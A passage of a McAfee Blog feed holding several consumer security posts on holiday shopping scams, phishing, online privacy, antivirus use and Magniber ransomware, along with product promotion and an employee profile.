You can avoid these sites by going to the retailer’s site directly. Be skeptical of any links you receive by email, text, or direct message—it’s best to go to the site yourself by manually typing in the legitimate address yourself and look for the deal there.  

4) The hot deal scam  

At the heart of holiday shopping is scarcity. And scarcity is something scammers love. There’s always some super-popular holiday item that’s tough to find, and scammers will spin up phony websites and offers around those items to lure you in. They may use the typosquatting technique mentioned above to pose as a legitimate retailer, or they may set up a site with their own branding to look legitimate on their own (or at least try). Either way, these scams can hurt you in a couple of ways—one, you’ll pay for the goods and never receive them; and two, the scammers will now have your payment info and address, which they can use to commit further fraud. 

If the pricing, availability, or delivery time all look too good to be true for the item in question, it may be a scam designed to harvest your personal info and accounts. Use caution here before you click. If you’re unsure about a product or retailer, read reviews from trusted websites to help see if it’s legitimate. (The Better Business Bureau is a great place to start—more on that in moment.) 

5) The fake charity scam 

In the season of giving, donating to charities in your name or in the name of others makes for a popular holiday gesture. Scammers know this too and will set up phony charities to cash in. Some indications that a phony charity has reached you include an urgent pitch that asks you to “act now.” A proper charity will certainly make their case for a donation, yet they won’t pressure you into it. Moreover, phony charities will outright ask for payment in the form of gift cards, wire transfers (like Western Union), money orders, or even cryptocurrency—because once those funds are sent, they’re nearly impossible to reclaim when you find out you’ve been scammed. 

There are plenty of ways to make donations to legitimate charities, and the U.S. Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count 

So, how can I avoid getting scammed on Black Friday and Cyber Monday? 

Some of it takes an eagle eye that can spot these scams as they pop up in your inbox, texts, social media feed, and so on. Yet you have further ways you can keep safe while shopping on Black Friday, Cyber Monday, and any time. 

Stick with known, legitimate retailers online 

This is a great one to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

Look for the lock icon in your browser when you shop 

Secure websites begin their address with “https,” not just “http.” That extra “s” in stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website.  

Pay with a credit card instead of your debit card  

In the U.S., the Fair Credit Billing Act offers the public protection against fraudulent charges on credit cards, where citizens can dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well. However, debit cards aren’t afforded the same protection under the Act. Avoid using a debit card while shopping online and use your credit card instead.  

Use two-factor authentication on your accounts  

Two-factor authentication is an extra layer of defense on top of your username and password. It adds in the use of a special one-time-use code to access your account, usually sent to you via email or to your phone by text or a phone call. In all, it combines something you know, like your password, with something you have, like your smartphone. Together, that makes it tougher for a crook to hack your account. If any of your accounts support two-factor authentication, the few extra seconds it takes to set up is more than worth the big boost in protection you’ll get.  

Use a VPN if you’re shopping on public Wi-Fi  

Public Wi-Fi in coffee shops and other public locations can expose your private surfing to prying eyes because those networks are open to all. Using a virtual private network (VPN) encrypts your browsing, shopping, and other internet traffic, thus making it secure from attempts at intercepting your data on public Wi-Fi, such as your passwords and credit card numbers.  

What’s more, a VPN masks your whereabouts and your IP address, plus uses encryption that helps keep your activities private. As a result, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. 

Clean up your personal data online 

Yes, it’s true. Your information gets collected, bought, and solid online. In fact, personal information fuels a global data trading economy estimated at $200 billion U.S. dollars a year. Run by data brokers that keep hundreds and even thousands of data points on billions of people, these sites gather, analyze, buy, and sell this information to other companies as well as to advertisers. Likewise, these data brokers may sell this information to bad actors, such as hackers, spammers, and identity thieves who would twist this information for their own purposes. 

Getting your info removed from these sites can seem like a daunting task. (Where do I start, and just how many of these sites are out there?) Our Personal Data Cleanup can help by regularly scanning these high-risk data broker sites for info like your home address, date of birth, and names of relatives. It identifies which sites are selling your data, and depending on your plan, automatically requests removal. 

Protect your identity from identity thieves 

Another place where personal information is bought and sold, stored, and exchanged is the dark web. The problem is that it’s particularly difficult for you to determine what, if any, of your info is on the dark web, stashed away in places where hackers and thieves can get their hands on it. Identity monitoring can help. McAfee’s identity monitoring helps you keep your personal info safe by alerting you if your data is found on the dark web, an average of 10 months before our competitors. 

Monitored info can range anywhere from bank account and credit card numbers to your email addresses and government ID number, depending on your location. If your information gets spotted, you’ll get an alert, along with steps you can take to minimize or even prevent damage if the information hasn’t already been put to illegal use. 

Take advantage of identity protection 

Identity protection through McAfee takes identity monitoring a step further by offering, depending on your location and plan, identity theft coverage for financial losses and expenses due to identity theft, in addition to hands-on help from a recovery professional to help restore your identity—all in addition to the identity monitoring called out above, again depending on your location and plan. 

Monitor your credit 

Keeping an eye on your bills and statements as they come in can help you spot unusual activity on your accounts. A credit monitoring service can do that one better by keeping daily tabs on your credit report. While you can do this manually, there are limitations. First, it involves logging into each bureau and doing some digging of your own. Second, there are limitations as to how many free credit reports you can pull each year. A service does that for you and without impacting your credit score. 

Depending on your location and plan, McAfee’s credit monitoring allows you to look after your credit score and the accounts within it to see fluctuations and help you identify unusual activity, all in one place, checking daily for signs of identity theft. 

Use protection while you shop  

A complete suite of online protection software like McAfee+ can offer layers of extra security while you shop. In addition to the VPN, identity, credit monitoring, and other features mentioned above, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—along with a password manager that can create strong, unique passwords and store them securely as well. Taken together, McAfee+ offers all-in-one online protection for your identity, privacy, and security that can keep you far safer when you shop online—and as you spend your time online in general. 

What should I do if I fall victim to a Black Friday or Cyber Monday scam? 

Even if you take the proper precautions the unexpected can happen. Whether it’s a scam, an identity crime, or flat-out theft, there are steps you can take right away to help minimize the damage. 

The first bit of advice is to take a deep breath and get right to work on recovery. From there, you can take the following steps: 

1. Notify the companies involved 

Whether you spot a curious charge on your bank statement, discover potentially a fraudulent account when you check credit report, or when you get an alert from your monitoring service, let the bank or organization involved know you suspect fraud or theft. With a visit to their website, you can track down the appropriate number to call and get the investigation process started. 

2. File a police report 

Some businesses will require you to file a local police report and acquire a case number to complete your claim. Beyond that, filing a report is a good idea in itself. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well. 

3. Contact your governmental anti-fraud or trade organization 

In the U.S., the identity theft website from the Federal Trade Commission (FTC) is a fantastic resource should you find yourself in need. In addition to keeping records of the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. With a copy of your report, you can ask debtors to stop. 

4. Put on a credit freeze or lock 

An instance of identity fraud or theft, suspected or otherwise, is a good time to review your options for a credit freeze or lock. As mentioned earlier, see what the credit bureaus in your region offer, along with the terms and conditions of each. With the right decision, a freeze or lock can help minimize and prevent further harm. 

5. Continue to monitor 

Strongly consider using a monitoring service like the one we described earlier to help you continue to keep tabs on your identity. The unfortunate fact of identity theft and fraud is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity all around. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely—along with utilizing an identity monitoring service. 

6. Work with a recovery pro 

A recovery service can help you clean up your credit in the wake of fraud or theft, all by working on your behalf. Given the time, money, and stress that can come along with setting your financial record straight, leaning on the expertise of a professional can provide you with much-needed relief on several counts. 

Take an extra moment to spot those Black Friday and Cyber Monday scams  

Just as it’s always been, hackers, scammers, and thieves want to ruin a good thing. In this case, it’s your spirit of giving and sharing in the holiday season. Yet with this list of top scams and ways you can avoid them, you can keep bad actors like them at bay. Remember, they’re counting on you to be in a hurry this time of year, and maybe a bit stressed and a little disorganized to boot. Take your time while shopping out there and keep an eye out for their tricks. That extra moment can save you far more time and money than you may think. 

The post The Worst Black Friday and Cyber Monday Scams – And How to Avoid Them appeared first on McAfee Blog.

]]>
Less Is More: Why One Antivirus Software Is All You Need https://www.mcafee.com/blogs/internet-security/less-is-more-why-one-antivirus-software-is-all-you-need/ Sun, 30 Oct 2022 13:26:37 +0000 /blogs/?p=121567 Antivirus Software

Personal devices and the information they carry are incredibly valuable to their owners. It is only natural to want to protect...

The post Less Is More: Why One Antivirus Software Is All You Need appeared first on McAfee Blog.

]]>
Antivirus Software

Personal devices and the information they carry are incredibly valuable to their owners. It is only natural to want to protect your device like a royal family fortifying a medieval castle. Unlike medieval castles that depended upon layers and layers of protection (moats, drawbridges, spiky gates, etc.), personal devices thrive on just one defense: a devoted guard called antivirus software.  

Increasing your personal device’s security detail with more than one guard, or antivirus software is actually less effective than using a single, comprehensive option. Microsoft operating systems recognize the detriment of running two antivirus software programs simultaneously for real-time protection. Microsoft Windows automatically unregisters additional programs so they do not compete against each other. In theory, if you have a Microsoft device, you could run on-demand or scheduled scans from two different antivirus products without the operating system disabling one of them. But why invest in multiple software where one will do?  

If you do not have a Microsoft device, here is what could happen to your device if you run more than one antivirus program at a time, and why you should consider investing in only one top-notch product.  

Fight over potential viruses  

Antivirus programs want to impress you. Each wants to be the one to catch a virus and present you with the culprit, like a cat with a mouse. When antivirus software captures a virus, it locks it in a secure place to neutralize it. If you have two programs running simultaneously, they could engage in a tussle over who gets to scan, report, and remove the virus. This added activity could cause your computer to crash or use up your device’s memory.  

Report each other as suspicious  

Antivirus software quietly monitors and collects information about how your system runs, which is similar to how viruses operate. One software could mark the other as suspicious because real-time protection software is lurking in the background. So, while one antivirus program is busy blowing the whistle on the other, malicious code could quietly slip by.  

Additionally, users could be buried under a barrage of red flag notifications about each software reporting the other as suspicious. Some users become so distracted by the onslaught of notifications that they deactivate both programs or ignore notifications altogether, leaving the device vulnerable to real threats.  

Drain your battery and slow down your device  

Running one antivirus software does not drain your battery, and it can actually make your device faster. However, two antivirus programs will not double your operating speed. In fact, it will make it run much slower and drain your battery in the process. With two programs running real-time protection constantly in the background, device performance is extremely compromised.  

Antivirus software best practices 

There is no reason to invest in two antivirus programs when one solid software will more than do the trick to protect your device. Here are some best practices to get the most out of your antivirus software:  

1. Back up files regularly 

One habit you should adopt is backing up your files regularly. You never know when malware could hit and corrupt your data. Add it to your weekly routine to sync with the cloud and back up your most important files to an external hard drive.   

2. Keep your software up to date 

Whenever your software prompts you to install an update, do it! New cyber threats are evolving every day, and the best way to protect against them is to allow your software to stay as up-to-date as possible.  

3. Read the results reports    

Always read your antivirus results reports. These reports let you know the suspicious suspects your software was busy rounding up. It will give you a good idea of the threats your devices face and perhaps the schemes that you unknowingly fell into, such as clicking on a link in a phishing email. This information can also help you improve your online safety habits.  

Go with the single strongest antivirus, and more  

Everyone needs strong antivirus. Yet antivirus alone isn’t enough to beat back today’s threats. Hackers, scammers, and thieves rely on far more tricks than viruses and malware to wage their attacks, and data breaches slip billions of personal and financial records into the hands of bad actors. You’ll want to pair antivirus with further protection that covers your privacy and identity as well. 

For example the antivirus included with McAfee+ Ultimate can secure an unlimited number of household devices. Yet it offers far more than antivirus alone with our most comprehensive protection for your privacy, identity, and devices. The full list of features is long, yet you’ll get credit monitoring, dark web monitoring, removal of personal information from risky data broker sites, along with identity theft protection and restoration from a licensed expert if the unexpected happens. In all, it offers a single solution for antivirus, and far more that can protect you from the broad range of threats out there today. 

The post Less Is More: Why One Antivirus Software Is All You Need appeared first on McAfee Blog.

]]>
5 Ways to Protect Your Online Privacy https://www.mcafee.com/blogs/privacy-identity-protection/5-ways-to-protect-your-online-privacy/ Fri, 28 Oct 2022 13:13:38 +0000 /blogs/?p=121702

When you open your laptop or your mobile device, what is the first thing you do? Do you head to your...

The post 5 Ways to Protect Your Online Privacy appeared first on McAfee Blog.

]]>

When you open your laptop or your mobile device, what is the first thing you do? Do you head to your favorite social media site to skim the latest news, or do you place your weekly grocery delivery order? No matter what your daily online habits are, even the slightest degree of caution can go a long way in staying secure online.  

That’s because hackers are experts at hiding malware in your everyday online routines, or even infiltrating your cookies to steal login information and learn about your personal preferences.  

According to a StatsCan Canadian internet use survey, six out of ten internet users reported experiencing a cybersecurity incident. There are many hoops to jump through when navigating the digital landscape. By taking the necessary steps to remedy vulnerabilities in your digital activity, you can dramatically improve your online protection.  

Three online threats to watch out for  

Cybercriminals take advantage of online users through routine avenues you would not expect. Here are three common ways that cybercriminals eavesdrop on online users.  

1.  Adware 

Adware, or advertising-supported software, generates ads in the user interface of a person’s device. Adware is most often used to generate revenue for the developer by targeting unsuspecting online users with personalized ads paid by third parties. These third parties usually pay per view, click, or application installation.   

Though not always malicious, adware crosses into dangerous territory when it is downloaded without a user’s consent and has nefarious intent. In this case, the adware becomes known as a potentially unwanted application (PUA) that can remain undetected on users’ devices for long periods of time. According to a report by the Cybersecure Policy Exchange, an unintentionally installed or downloaded computer virus or piece of malware is one of the top five cybercrimes that Canadians experience. The PUA can then create issues like frequent crashes and slow performance.   

Users unknowingly download adware onto their device when they download a free ad-supported program or visit a non-secure site that does not use the Hypertext Transfer Protocol Secure (HTTPS) to encrypt online communication.   

2.  Malvertising 

Hackers also use invasive tactics known as ad injections, where they inject ads with malicious code for increased monetary gain. This is a practice known as “malvertising.” If a user clicks on a seemingly legitimate and well-placed ad, they risk exposing themselves to numerous online threats. These ads can be infected with malware such as viruses or spyware. For example, hackers can exploit browser vulnerabilities to download malware, steal information about the device system, and gain control over its operations. Hackers can also use malvertising to run fraudulent tech support scams, steal cookie data, or sell information to third-party ad networks.  

3.  Autofill 

Another vulnerability that many may not realize is their browser’s built-in autofill functions. As tempting as it is to use your browser’s autofill function to populate a long form, this shortcut may not be safe. Cybercriminals have found ways to capture credentials by inserting fake login boxes onto a web page that users cannot see. So, when you accept the option to autofill your username and password, you are also populating these fake boxes.   

Tips for rethinking your online habits  

Take a proactive approach to your digital protection the next time you are browsing the internet by reassessing your online habits. Check out these five tips to ensure you are staying as safe as possible online.  

1.  Clear your cookies on your browser 

Cookie data can contain anything from login information to credit card numbers. Cybercriminals looking to exploit this information can hijack browser sessions to pose as legitimate users and steal cookies as they travel across networks and servers. As a result, it is essential for online users to regularly clear out their cookies to better protect their information from falling into the wrong hands. Navigate to your browser’s history, where you can wipe the data associated with each browser session, including your cookies.   

2.  Use a reliable password manager 

Clearing your browser’s cookie data will also remove your saved logins, which is why leveraging a password manager can make it easier to access regularly visited online accounts.   

Many browsers come with a built-in password generator and manager; however, it is better to entrust your logins and password to a reputable password manager. Browser password managers are not as secure as password managers, because anyone who has access to your device will also access your online information. A password manager,  provides a more secure solution since it requires you to log in with a separate master password. A password manager also works across various browsers and can generate stronger passwords than those created by your browser.   

3.  Adjust browser privacy settings 

In addition to clearing cookie data, users should adjust their browser settings to ensure their online sessions remain private.   

Another option is to access the internet in Private Browsing Mode to automatically block third-party tracking, making it a quick and easy option to ensure private browsing. Users can also enable the “do not track” function of their browser to prevent third-party tracking by advertisers and websites. Additionally, you can adjust your browser settings to block pop-up ads and control site permissions, such as access to cameras and locations.   

4.  Use an ad blocker 

Ad blockers suppress unwanted and potentially malicious ads to ensure a safer browsing experience. Ad blockers can also make it easier to view page layout by removing distracting ads and optimizing page load speed. Additionally, they prevent websites from tracking your information that third parties can sell.  

5.  Leverage a reputable security solution  

Deploying a security solution like McAfee+ Ultimate ensures the safest internet browsing experience through a holistic approach for threat detection, protection, and remediation. Equipped with a password manager, antivirus software, and firewall protection, users can effectively sidestep online threats while browsing the internet. Moreover, it includes comprehensive privacy and identity protection, such as our Personal Data Cleanup, dark web monitoring, credit monitoring, along with ways you can quickly Lock or freeze your credit file to help prevent accounts from being opened in your name. 

Take action to ensure safe browsing  

Your online behavior can say a lot about you so make sure you safeguard your internet protection. Whether it is through malvertising or invisible forms, hackers can glean information to paint a picture of who you are to target you through deceptive tactics. Cybercriminals are always looking for vulnerabilities which is why assessing your online habits sooner rather than later is a critical first step to smarter online browsing.  

The post 5 Ways to Protect Your Online Privacy appeared first on McAfee Blog.

]]>
For some, accounting is more than just spreadsheets! Vernon’s McAfee Journey https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/for-some-accounting-is-more-than-just-spreadsheets-vernons-mcafee-journey/ Wed, 26 Oct 2022 14:32:49 +0000 https://www.mcafee.com/blogs/?p=161118

Vernon has been our Manager of Technical Accounting for more than two years, but that doesn’t mean he’s busy with...

The post For some, accounting is more than just spreadsheets! Vernon’s McAfee Journey appeared first on McAfee Blog.

]]>

Vernon has been our Manager of Technical Accounting for more than two years, but that doesn’t mean he’s busy with spreadsheets and numbers all day.

My McAfee career journey story

It’s been an amazing ride so far. My team touches on several areas of responsibility, including financial period closing, financial reporting, and accounting for complex transactions.

​​​​​​​The most rewarding part of my role is definitely the variety and complexity – they really go hand-in-hand and I enjoy asking questions and figuring out the solutions, even when there is not always a textbook answer. I enjoy the challenge of working collectively with a team to find solutions by applying research and experience to a set of facts.

It’s also rewarding to be able to collaborate with auditors and other stakeholders who would be interested in the results.

Talent and collaboration – a rare combo

​​​​​​​My favorite thing about working at McAfee is the team. We have an amazing team. It’s full of really smart people. I’ve seen some companies try and find the best talent they can, but McAfee has just taken that to a whole different level. Everyone in their respective areas is really tuned in to the broader effort and we work well together. At McAfee, we enjoy both a high level of talent and collaborative effort. You don’t often find both in the same place. ​​​​​​​

My leadership philosophy

I really believe that each person brings certain strengths to the table, and they should be able to exercise those strengths to develop and expand their capabilities. Once those natural roles are established, it’s best to trust them to determine how best to perform in their roles and collaborate with the team in achieving results that add value to the broader group.

My advice for anyone looking to drive their career forward is

​​​​​​​First, expect the unexpected – consider each new experience an opportunity for personal growth.

Secondly, get involved in projects. If you have the opportunity to do something different or work with a cross-functional team, do it. It builds your own skill base, which opens the door for greater future opportunities and you get to meet people outside of your own department and develop relationships that may prove valuable over time.

The post For some, accounting is more than just spreadsheets! Vernon’s McAfee Journey appeared first on McAfee Blog.

]]>
Staying safer online from phishing and other attacks https://www.mcafee.com/blogs/privacy-identity-protection/staying-safer-online-from-phishing-and-other-social-engineering-attacks/ Wed, 26 Oct 2022 13:27:10 +0000 https://www.mcafee.com/blogs/?p=129916

When you’re online, the world is at your fingertips. You can do amazing things like stream the latest movies while they’re still in theaters! Or...

The post Staying safer online from phishing and other attacks appeared first on McAfee Blog.

]]>

When you’re online, the world is at your fingertips. You can do amazing things like stream the latest movies while they’re still in theaters! Or you can enjoy the convenience of online shopping and avoiding the DMV by renewing your driver’s license remotely.  This is possible because we’re able to communicate with these organizations through many different channels and we trust them. Unfortunately, many bad actors have taken advantage of this trust and the ease of communication to up their game when it comes to social engineering.  

What is social engineering? One of the more famous examples of social engineering was the Nigerian Prince email scam. In this example, hackers relied on a novel, too-good-to-be-true story of a prince looking to transfer some of his fortune if only he could use your bank account number. The Nigerian Prince is a running joke these days, the internet version of “if you believe that, then I have a bridge to sell you,” but its original success made scammers realize they were onto something big.  

Modern social engineering campaigns closely resemble communications from legitimate organizations. They’re carefully designed, may be grammatically correct, and appear in completely plausible scenarios. However, they’re all after the same thing – information to gain access to an organization or individual’s accounts.  

Phishing is common form of social engineering 

Phishing is a type of social engineering that uses email or websites to convince people to give up their personal information, under the guise of a plausible reason. Instead of a Nigerian prince asking for a bank account number, an email posing as your bank may ask for you to confirm your account information. Often these emails are tied to circumstances that demand your attention and reflect a sense of urgency. Needless to say, many recent phishing scams have played into COVID-19 pandemic fears and economic concerns. Here are a few other scams related to phishing to watch out for: 

  • Vishing refers to phone calls trying to get information from people. Think cruise ship vacations and car warranties and you’re on the right track. Chances are you’ve gotten a robocall that qualifies as vishing 
  • Smshing is the text version of a phishing campaign. These messages are especially malicious as they may have links that take you to fake web pages or dial a phone number.  

Here’s how to identify a phishing campaign in a few easy steps 

First, does the message you’ve received contain any of the following: 

  • Notification of suspicious activity or log-in attempts 
  • A claim that’s there’s a problem with your account or your payment information 
  • Request to confirm personal information 
  • fake invoice 
  • A link to make a payment 
  • Says you’re eligible to register for a government refund 
  • A coupon for free stuff 

If so, check for these tell-tale signs used by phishing scams 

  • A sender address that’s just slightly off – Cybercriminals addresses that closely resemble ones from a reputable company with just a few alterations of letters or other characters.  
  • Lack of personalization – Generic greetings that don’t reference your name or email address may be an indicator of a phishing email. 
  • Hyperlinks and site addresses that don’t match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you’d expect from the sender? It may be a spoofed address from the  
  • Spelling and layout – Strange grammar and less-than-polished email layouts can be obvious signs that this is a scam email impersonating a large company.  
  • Attachments – Be wary of any attachment in an email. Attachments are great way to deliver viruses and malware to your device. 

If the email you’re suspicious of has several of the above warning signs, chances are you’ve spotted a phishing email. Still not sure what we’re talking about? Check in your email’s spam and you’ll probably see some obvious examples of phishing right away. Spam doesn’t catch everything though, and the best phishing scams can be very difficult to separate from the legitimate emails. With that in mind, we’ve pulled together some safety precautions that will help keep you safer, from phishing emails. 

Preventing and avoiding phishing scams 

  • Confirm the source. Unsolicited phone calls, visits, or emails are best avoided altogether or confirmed with a second source. Verify the sender or caller’s identity with the organization they claim to represent. Use contact information from a previous communication you know to be legitimate. 
  • Keep personal information private over email. Don’t reveal personal or financial info over an email or do so by following links provided in an email. 
  • Install and maintain online protection, like McAfee’s Total Protection. This kind of protection includes firewalls and even web browsing advisors to help you reduce spam and verify sites.  
  • Take advantage of email client and web browser antispam and link verification features. 
  • Use multi-factor authentication and a password manager to ensure even if your login information is stolen, scammers can’t access your accounts. 

The post Staying safer online from phishing and other attacks appeared first on McAfee Blog.

]]>
Ransomware Masquerading as Microsoft Update Targets Home Computers https://www.mcafee.com/blogs/internet-security/ransomware-masquerading-as-microsoft-update-targets-home-computers/ Tue, 25 Oct 2022 00:38:53 +0000 https://www.mcafee.com/blogs/?p=161057

A new ransomware threat is currently sweeping its way across home computers. And what’s making it extra tricky is that...

The post Ransomware Masquerading as Microsoft Update Targets Home Computers appeared first on McAfee Blog.

]]>

A new ransomware threat is currently sweeping its way across home computers. And what’s making it extra tricky is that it’s disguised as an operating system update. 

Be on the lookout for this new ransomware scheme and protect yourself from ransomware with a few of these tips. 

What Is Magniber Ransomware? 

Magniber is a new type of ransomware that is disguised at almost every touchpoint until it seemingly pops out of nowhere demanding money. The attack begins when someone visits a fake Windows 10 update website owned by the Magniber cybercriminal group. Once someone clicks on a malicious link on that site, file-encrypting malware downloads onto the device. 

Another stealth maneuver of Magniber is that the encryption malware downloads as a JavaScript file straight to the memory of the device, which can often slide under an antivirus’ radar. This malware allows the criminal to view, delete, and encrypt files and gain administrator access of the device. Usually, before the person even knows their device is in danger, Magniber reveals itself and demands a ransom payment in exchange for releasing the documents and giving back control of the computer. If the device owner refuses to pay, the criminal threatens to delete the files forever.1 

Personal Ransomware May Be on the Rise 

For the last several years, large companies fell left and right to breaches. Hacker groups infiltrated complex cybersecurity defenses, got ahold of sensitive company or customer information, and threatened to release their findings on the dark web if not paid a hefty ransom. The reasons cybercriminals targeted corporate databases versus personal devices wasn’t just because they could demand multiple millions, but because companies were better equipped to make ransom transactions anonymously. Often, cryptocurrency transactions are untraceable, which allows criminals to remain at large. 

Now that more everyday people are proficient in cryptocurrency, ransomware may shift to targeting personal devices. Though the ransom payments won’t be as lucrative, there also won’t be corporate cybersecurity experts hot on the cybercriminal’s tail. 

How to Keep Your Device Safe 

To avoid ransomware schemes similar to Magniber, adopt these three habits to better protect your device and digital privacy: 

  • Turn on automatic updates. It’s best practice to accept all new software and device updates, which makes Magniber an especially difficult threat to detect. Consider configuring your device to auto-update. If you enable automatic updates, you can then treat any other popups or update websites with skepticism. To validate if an update prompt is genuine, go to your operating system or device’s corporate page and search for any announcements about new updates.  
  • Regularly back up your important files. If you store sensitive documents (like your tax returns) or sentimental files (like your wedding photos) on your computer, consider also backing them up on an external hard drive. Not only will that free up memory on your device, but it’ll also protect them in case a cybercriminal takes control of your computer. When your device is scrubbed of these important files in the first place, you can factory reset your device without losing anything. That way, the cybercriminal gets nothing: neither your personal information nor your money. 
  • Avoid risky sites. Magniber downloaded onto devices after a person visited a site controlled by the cybercriminal. If you’re ever suspicious about any site, it’s best to leave and not click on any links while you’re there. Even sites that attempt to mimic legitimate ones leave a few clues that they’re fake. Check for typos, blurry logos, incorrect grammar, and hyperlinks that direct to long, unfamiliar URLs. 

Ransomware Protection 

If a cybercriminal gets in touch with you and demands a ransom, immediately contact your local FBI field office and file a report with the FBI’s Internet Criminal Complaint Center. From there, the authorities will advise you on how to proceed.  

Something you can start with now to defend against ransomware is to invest in McAfee+ Ultimate. It provides the most thorough device, privacy, and identity protection, including $25,000 in ransomware coverage. 

1ZDNET, “This unusual ransomware attack targets home PCs, so beware 

The post Ransomware Masquerading as Microsoft Update Targets Home Computers appeared first on McAfee Blog.

]]>
Protect yourself from scams this Diwali https://www.mcafee.com/blogs/internet-security/diwali/ Mon, 24 Oct 2022 23:18:25 +0000 https://www.mcafee.com/blogs/?p=160999

It’s Diwali, a time of light, a time of togetherness, and, of course, a time of celebration. Along with Diwali...

The post Protect yourself from scams this Diwali appeared first on McAfee Blog.

]]>

It’s Diwali, a time of light, a time of togetherness, and, of course, a time of celebration. Along with Diwali comes the traditional acts of dana and seva, as well as gift-giving to the friends and family members they honor and love. However, it’s also a time when thieves get busy—where they hop online and take advantage of all that goodwill with all manner of scams. 

It’s unfortunate yet true. Thieves flock to where the money is, and plenty of money gets exchanged online during Diwali. As you shop online for that thoughtful gift or to donate online to a cause you care about, keep an eye out for the scams that these thieves set. Because they’re out there.  

Yet you have several ways you can spot their scams, along with several ways you can protect yourself further from them. The thing is, online thieves tend to use the same old tricks, which means a sharp eye and a little prevention on your part can keep you far safer during Diwali.  

For starters, let’s look at some of the most common scams out there. 

Top online shopping scams to avoid during Diwali 

1) The bogus website scam  

A classic scammer move is to “typosquat” phony email addresses and URLs that look awfully close to legitimate addresses of legitimate companies and retailers. So close that you may overlook them. They often appear in phishing emails and instead of leading you to a great deal, these can in fact link you to scam sites that can then lift your login credentials, payment info, or even funds should you try to place an order through them.  

You can avoid these sites by going to the retailer’s site directly. Be skeptical of any links you receive by email, text, or direct message—it’s best to go to the site yourself by manually typing in the legitimate address yourself and looking for the deal there.  

2) The hot deal scam  

In some cases, thieves will set up shopping websites that offer a popular or hard-to-find item at a great price. Yet if the pricing, availability, or delivery time all look too good to be true for the item in question, it may be a scam designed to harvest your personal info and accounts—because, surprise, they don’t have the item at all. The site will take your payment, yet you’ll never receive the item. What’s more, the scammers will have your payment info and address, which they can use to cause further harm. 

Use caution here before you click. If you’re unsure about a product or retailer, read reviews from trusted websites to help see if it’s legitimate. You can also use a service like Who.Is and see how recently the site was created. If the site was only put up very recently, it could be a sign of a scam. 

3) The fake charity scam 

In the spirit of dana, donating to charities makes for a popular Diwali gesture. Scammers know this too and will set up phony charities to cash in. Some indications that a phony charity has reached you include an urgent pitch that asks you to “act now.” A proper charity will certainly make their case for a donation, yet they won’t pressure you into it. Moreover, phony charities will outright ask for payment in the form of gift cards, wire transfers, money orders, or even cryptocurrency—because once those funds are sent, they’re nearly impossible to reclaim when you find out you’ve been scammed. 

There are plenty of ways to make donations to legitimate charities, and the NGO Darpan site offers resources that can help you make an informed choice 

4) Prize and gift scams 

Whether they come to you by email, direct message, or text message, scammers will blast out phoney prize and gift notifications during Diwali. And of course, there’s a catch. To claim your “prize” or “gift,” the scammers require you to fill out a questionnaire. Once again, there’s no gift or prize in play here. Just a thief on the other end attempting to steal your personal information to commit other fraud down the road.  

Look out for these scams, as many have URLs that end in .cn (the Chinese domain). Both .xyz, and .top are popular URL domains for these scams. Several can look quite legitimate, yet if you haven’t entered in a legitimate contest, drawing, or lottery yourself, there’s a very good chance this is a scam. 

Avoid getting scammed during Diwali 

Aside from knowing how to spot scams, you can take several other preventative measures that can keep you safe as you shop, donate, or simply spend time online. 

Stick with known, legitimate retailers and charities online 

This is a great one to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. As mentioned in the bogus website scam and the prize scams above, thieves will often create web addresses that look nearly identical to legitimate addresses of well-known companies hoping that you won’t look closely at them, then click or tap that bad link.  

If you get an offer sent to you via email, text, or any other message, don’t click the link. Visit the site directly and look for the offer there. 

Look for the lock icon in your browser when you shop 

Secure websites begin their address with “https,” not just “http.” That extra “s” in stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website.  

Use a VPN if you’re shopping on public Wi-Fi  

Public Wi-Fi in coffee shops and other public locations can expose your private surfing to prying eyes because those networks are open to all. Using a virtual private network (VPN) encrypts your browsing, shopping, and other internet traffic, thus making it secure from attempts at intercepting your data on public Wi-Fi, such as your passwords and credit card numbers.  

What’s more, a VPN masks your whereabouts and your IP address, plus uses encryption that helps keep your activities private. As a result, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. 

Use protection while you shop online 

A complete suite of online protection software like McAfee can offer layers of extra security while you shop. In addition to the VPN, identity, credit monitoring, and other features mentioned above, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—along with a password manager that can create strong, unique passwords and store them securely as well. Taken together, McAfee offers all-in-one online protection for your identity, privacy, and security that can keep you far safer when you shop online—and as you spend your time online in general. 

A brighter, safer Diwali for you and your family online 

If celebrating Diwali takes you online in any way, keep an eye open for the scams that typically pop up this time of year. Sadly, they’re out there, because it’s such a prime time of year for online shopping, gift-giving, and donations.  

As you can see, thieves use several types of common scams that simply dress themselves up in different ways. Taking a moment to pause and consider what you’re seeing before you click or buy can help you spot those scams.  

